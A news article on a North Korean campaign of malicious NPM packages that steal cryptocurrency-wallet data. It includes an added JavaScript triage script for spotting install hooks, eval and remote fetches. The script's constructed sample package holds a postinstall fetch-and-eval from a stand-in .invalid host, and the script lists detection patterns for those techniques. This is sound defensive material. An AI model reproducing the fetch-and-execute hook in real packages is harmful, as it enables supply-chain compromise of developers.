Cybersecurity researchers have identified a recent surge in malicious activity by North Korean threat groups, revealing a coordinated campaign targeting the NPM ecosystem.
The campaign began on August 12, 2024 and involved publishing malicious NPM packages designed to infiltrate developer environments and steal sensitive data.
The newly discovered packages, including temp-etherscan-api, ethersscan-api and telegram-con, display advanced tactics such as multi-stage obfuscated JavaScript that downloads additional malware from external servers.
Malicious NPM packages
According to a blog post published by Phylum today, the malware downloads Python scripts and a full Python interpreter, which search for data in cryptocurrency wallet browser extensions while establishing persistence on the affected systems. In particular, the qq-console package is attributed to a well-known North Korean campaign called "Contagious Interview".
Researchers identified another package, helmet-validate, published on August 23, 2024, which uses a different attack method. It embeds JavaScript that fetches and executes malicious code from an external endpoint, ipcheck[.]cloud. This domain is linked to earlier North Korean operations, including fake job campaigns that used the mirotalk[.]net domain, highlighting a pattern of recurring tactics.
The most recent package, sass-notification, was published on August 27, 2024 and is linked to the "Moonstone Sleet" campaign. This package uses obfuscated JavaScript to execute scripts that download, decode and run external payloads while removing traces of the malicious activity, so that the package appears to be harmless software.
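The packages described above share three reviewable traits: they run something at install time, they carry obfuscated or dynamically evaluated code, and they fetch a further stage from an external endpoint. The following static triage pass is an added example, not code from the article, from Phylum or from any of the packages named; it flags those traits in a package's package.json and source files so a reviewer knows where to look. The sample package contents, the indicator names and the reserved .invalid domain are all constructed for the example and nothing is fetched.

```javascript
// Added example: static triage of an npm package for install-time hooks,
// evaluated/obfuscated code and external fetches. Every hit is a lead for a
// human reviewer, not a verdict on its own.

// npm lifecycle scripts that run automatically on install.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Coarse source-code indicators (constructed names). The last one is global so
// every URL in a file is collected, not only the first.
const PATTERNS = [
  ["dynamic-eval", /\beval\s*\(|new\s+Function\s*\(/],
  ["child-process", /require\s*\(\s*['"]child_process['"]\s*\)/],
  ["hex-escape-blob", /(\\x[0-9a-fA-F]{2}){16,}/],
  ["long-base64-blob", /['"][A-Za-z0-9+/]{200,}={0,2}['"]/],
  ["remote-fetch", /https?:\/\/[^\s'"`)]+/g],
];

// Scan one source file; returns one finding per indicator (per URL for fetches).
function scanSource(fileName, text) {
  const findings = [];
  for (const [indicator, re] of PATTERNS) {
    if (re.global) {
      for (const m of text.matchAll(re)) {
        findings.push({ file: fileName, indicator, detail: m[0] });
      }
    } else {
      const m = text.match(re);
      if (m) findings.push({ file: fileName, indicator, detail: m[0].slice(0, 40) });
    }
  }
  return findings;
}

// Triage a package from its package.json text and a map of file name -> source.
// Returns a verdict, the distinct indicators, the URLs seen and all findings.
function triagePackage(packageJsonText, files) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ file: "package.json", indicator: "lifecycle-hook",
                      detail: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [name, text] of Object.entries(files)) {
    findings.push(...scanSource(name, text));
  }
  const indicators = [...new Set(findings.map((f) => f.indicator))].sort();
  const codeHit = indicators.some((id) => id !== "lifecycle-hook");
  // "review": code runs at install time AND shows a suspicious trait.
  const verdict = indicators.length === 0 ? "clean"
    : indicators.includes("lifecycle-hook") && codeHit ? "review"
    : "suspicious";
  const urls = findings.filter((f) => f.indicator === "remote-fetch").map((f) => f.detail);
  return { verdict, indicators, urls, findings };
}

// Constructed sample mirroring the fetch-decode-execute pattern the article
// describes. The domain is a reserved .invalid name and the blob is filler.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "sample-pkg", version: "1.0.0",
  scripts: { postinstall: "node index.js" },
});
const SAMPLE_FILES = {
  "index.js": [
    "const https = require('https');",
    "const cp = require('child_process');",
    "const blob = '" + "\\x41".repeat(20) + "';",
    "https.get('https://example.invalid/stage2.js', res => {",
    "  let body = ''; res.on('data', d => body += d);",
    "  res.on('end', () => eval(body));",
    "});",
  ].join("\n"),
};

const RESULT = triagePackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES);
console.log(RESULT.verdict, RESULT.indicators.join(","), RESULT.urls.join(","));
```

On a real package the file map would be built by walking the extracted tarball; the point of the verdict logic is that an install hook alone is common and benign, while an install hook combined with a fetch or an eval is the combination that deserves a manual read before the package is allowed into a build.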
Increasing exploitation of NPM by threat actors
Phylum warned that these attacks underline the increasing exploitation of NPM by threat actors to compromise developer systems.
"The diversity and simultaneous deployment of these attack vectors reveal a coordinated and ruthless campaign by North Korean-aligned threat actors," the company said.
"These adversaries are continually exploiting the inherent trust in the NPM ecosystem to compromise developers, infiltrate companies and steal cryptocurrency or other assets that can lead to illicit financial gain."